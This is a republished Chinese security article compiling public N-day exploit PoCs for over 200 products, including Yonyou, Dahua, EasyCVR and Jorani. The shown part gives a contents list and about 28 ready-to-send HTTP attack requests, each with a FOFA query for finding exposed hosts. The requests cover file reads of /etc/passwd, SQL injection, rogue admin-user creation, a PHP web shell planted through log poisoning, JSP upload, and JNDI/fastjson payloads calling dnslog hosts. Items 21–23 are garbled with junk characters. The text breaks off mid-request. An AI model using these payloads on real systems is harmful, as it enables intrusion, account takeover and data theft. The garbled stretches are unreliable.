Compilation of Publicly Disclosed Internet Vulnerabilities, 202309-202406
道一安全 (Daoyi Security) 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界 (author: 网络安全新视界).

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks in offense-defense exercises; we hope this article helps with your defense. Defenders can use its contents to check their own exposure.

Vulnerability sources: The article covers 203 PoCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: All vulnerabilities are publicly known; for patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few overly long PoCs are replaced by the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: If any content infringes on a party's legitimate rights, contact the 网络安全新视界 team through the backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to receive the full list" gate. This article is the most complete version available; just press F12 and search for keywords when using it.

Bookmark this article if you find it useful. You can also follow this official account (网络安全新视界).

Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. Hongfan (红帆) HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
70. Wanhu (万户) ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin (奇安信) 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

1. StarRocks MPP database unauthenticated access
FOFA :title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA :title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA :title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA :title="EasyCVR"
Set password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA:icon_hash="-1344736688"
After logging into the admin backend with the default admin account, perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the double URL encoding of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA:icon_hash="953405444"

After upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step one: obtain the cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the function is executed and base64 encoding is applied
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the test range to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA:body="jshERP-boot"
Leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
Leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:1002
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan (红帆) HFOffice 医微云 SQL injection
FOFA:title="HFOffice"
The PoC calls a function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua (大华) ICC intelligent IoT management platform arbitrary file read
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

+ B8 n5 {, q, ^& L! ^1 g21. 大华ICC智能物联综合管理平台random远程代码执行
7 @$ E6 {0 ?2 `7 R8 aFOFA:icon_hash="-1935899595"8 M. M/ ] A4 u, ?& T
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1% D/ V/ V: T8 W9 ]: a5 n9 E5 D6 D6 J
Host: x.x.x.x3 h V: F' b/ K# X7 C; {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! T2 r: U6 k! v$ b' f6 i q4 M
Content-Length: 161
, s0 k, p2 z: a; _9 zAccept-Encoding: gzip
7 m* U: Q4 g5 }6 cConnection: close
; `6 P8 g1 }! j, g7 L/ w3 L* TContent-Type: application/json;charset=utf-8
+ v- w8 e8 g1 {7 @; {7 m/ N, E" g P' i0 |
{
& K; f/ h; _8 }1 S! \- B"a":{, }' |; G7 e3 N
"@type":"com.alibaba.fastjson.JSONObject",
: a: X; L+ C+ ]( T$ A5 d+ p3 V {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
3 S- P/ \, R) H1 ], T6 a: I3 I }""
5 `* P2 V( M& u2 g' M* u) \}/ a [% @ v1 I; h, c) S) g
9 R8 q. u# x/ |- A+ @% Y
% ]; N$ T! H7 @$ t8 N22. 大华ICC智能物联综合管理平台 log4j远程代码执行
5 R j* O2 j. U! E) }* q- A7 KFOFA:icon_hash="-1935899595"
9 K6 U n5 n' ?$ Z2 G* UPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1, u" i* Z3 q }, X5 F/ }" b2 K
Host: your-ip
" U" q$ y' n" v/ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 N5 I4 t) f1 |' Q! ]- G( S
Content-Type: application/json;charset=utf-8
! s7 f9 M; w5 t- _) C1 F% @, Q7 i* V' s' T
{
. d# o/ s/ x u9 u"loginName":"${jndi:ldap://dnslog}"
/ i8 V E& q. f6 d}+ y+ |! E5 j# W2 `9 `, A
6 o6 R/ Z# ^ H; l% Q
/ f9 g( Y/ I2 F& f
i+ k( q' T! ?1 A23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
7 ^* {1 X( x% c5 ^8 y1 X S% _FOFA:icon_hash="-1935899595"9 p# C" X# ~4 `- n7 P1 E3 k4 t
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
# b7 M# L7 i# H- F& @Host: your-ip
) B6 W0 F% u/ D6 ^4 F2 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% x$ L; J' t5 _1 u& |
Content-Type: application/json;charset=utf-8
% S% W4 f( ]5 B6 W6 H! `Accept-Encoding: gzip3 K" n, L* G* w5 u. n
Connection: close
1 G Z0 M" O) R! L
0 L# N, B- l' K0 [4 z& x: H{% k0 e0 W, X+ g1 X o% j
"a":{
7 Y4 H3 X% j, `* ?+ ]) M* n "@type":"com.alibaba.fastjson.JSONObject",6 p( H9 M5 [; q( [( [
{"@type":"java.net.URL","val":"http://DNSLOG"}
6 s8 u2 |+ e6 {2 w; [* E }"", B1 {# C' O7 ~) g i3 S: z0 w u
}% ^& X& K$ L* U I
/ B; Q M5 f# a `6 z# Q% N* C- w4 d. B; c! C
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
